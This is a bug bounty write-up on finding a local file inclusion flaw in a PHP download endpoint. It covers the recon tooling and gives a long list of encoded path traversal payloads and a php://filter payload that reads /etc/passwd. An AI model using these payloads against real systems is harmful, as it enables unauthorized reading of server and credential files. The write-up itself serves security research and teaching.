Easy LFI

Easy Local File Inclusion Report

Hello Hackers !!

I`m going to share one of my last & fast finding

let’s call it target.com, they runs a bug bounty program with wildcard scope *.target.com

Tools:

Subdomains Enumeration

In this step it`s a gold tip to use multiple tools to gather good results, I like to use Subdomainer

Subdomainer is an automation tool for domains & subdomains gatherin wheather for single target or multiple targets. Subdomainer uses multiple tools for doing the subdomains & domians gathering job in a perfect way, it can take a domains / targets list and doing the whole operation on them and after finshing the job it save the result in a comprehandable & ordered way.

A simple usage for Subdomainer

./subdomainer -t target.com –f true

A lot of thing comes after subdomains gathering, one of them is collect all urls from live hosts and filter any intersting parameters or endpoints

Collect Them All

So in this step I use waybackurls

Usage Of Waybackurl: This is really a good tool for bugbounty hunter to fetch all url from wayback machine .

cat all_live.txt | waybackurls

Wrapper

Now we have all wayback urls now You can grep to collect you interesting parameter or end point usage:

grep -iE “redirect=”

But that would take a lot of time and effort. To automate this process we can use gf tool

A wrapper around grep to avoid typing common patterns.

cat waybackdata | gf lfi | tee -a lfi.txt

after that we can go and check these endpoint manually

Luckily, I noticed a very promising endpoint /download.php?file and my spidey sense got activated

After visiting this host i found that this endpoint was for downloading pdf files

when trying to inject 1 to this parameter It downloads a file contain this error

so clearly this function job is to seacrh for a requested file via this parametr in this path and try to get

without another thought i injected some payloads like this:

..\..\{FILE}
..\..\..\{FILE}
..\..\..\..\{FILE}
..\..\..\..\..\{FILE}
..\..\..\..\..\..\{FILE}
..\..\..\..\..\..\..\{FILE}
..\..\..\..\..\..\..\..\{FILE}
..%255c{FILE}
..%255c..%255c{FILE}
..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
..%5c..%5c{FILE}
..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
%2e%2e\{FILE}
%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%252e%252e\{FILE}
%252e%252e\%252e%252e\{FILE}

But no luck .. i got the same error message

in spite of that something was telling me to keep digging into this 🧐

By using wappalyzer I found that this host is running on php, so I used php file wrappers payload

php://filter/convert.base64-encode/resource=/etc/passwd

php://filter allows a pen tester to include local files and base64 encodes the output. Therefore, any base64 output will need to be decoded to reveal the contents

So let`s decode this base64 string

echo "BASE64_STRING" | base64 -d

And we got our /passwd file decoded